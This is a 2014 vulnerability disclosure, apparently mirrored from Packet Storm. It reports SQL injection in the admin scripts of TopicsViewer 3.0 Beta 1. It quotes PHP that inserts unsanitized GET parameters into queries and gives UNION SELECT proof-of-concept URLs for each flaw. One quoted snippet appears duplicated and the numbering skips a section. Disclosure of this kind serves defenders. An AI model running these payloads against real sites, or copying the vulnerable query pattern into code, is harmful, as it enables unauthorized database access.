Lucene search
K

TopicsViewer 3.0 Beta 1 SQL Injection

🗓️ 31 Jan 2014 00:00:00Reported by AtT4CKxT3rR0r1STType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

TopicsViewer 3.0 Beta 1 SQL Injection Vulnerabilit

Code
`TopicsViewer v3.0 Beta 1 - Multiple Sql Injection Vulnerabilty  
===================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [[email protected]] , [[email protected]]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://www.topicsviewer.com/  
####################################################################  
  
Multiple Sql Injection  
======================  
  
VULNERABILITY  
##############  
[I] /admincp/edit_block.php (line 46-48)  
  
$sql_b_e = "select * from blocks where b_id = $_GET[id] ";  
$result_b_e = @mysql_query ($sql_b_e);  
$block = @mysql_fetch_array ($result_b_e);  
  
#########  
EXPLOIT  
#########  
localhost/Path/admincp/edit_block.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10  
  
VULNERABILITY  
##############  
[II] /admincp/edit_cat.php (line 77-79)  
  
$sql = "select * from cat where c_id = $_GET[id]";  
$result = @mysql_query ($sql);  
$cat= @mysql_fetch_array ($result);  
  
#########  
EXPLOIT  
#########  
localhost/Path/admincp/edit_cat.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8  
  
VULNERABILITY  
##############  
[III] /admincp/edit_note.php (line 77-79)  
  
$sql = "select * from cat where c_id = $_GET[id]";  
$result = @mysql_query ($sql);  
$cat= @mysql_fetch_array ($result);  
  
#########  
EXPLOIT  
#########  
localhost/Path/admincp/edit_note.php?id=1+and+1=2+union+select+1,version(),3,4,5  
  
  
VULNERABILITY  
##############  
[V] /admincp/rmv_topic.php (line 46-47)  
  
$sql = "select * from topics where t_id = $_GET[id] LIMIT 1 ;";  
$result = @mysql_query ($sql);  
  
#########  
EXPLOIT  
#########  
localhost/Path/admincp/rmv_topic.php?id=1+and+1=2+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14  
  
####################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation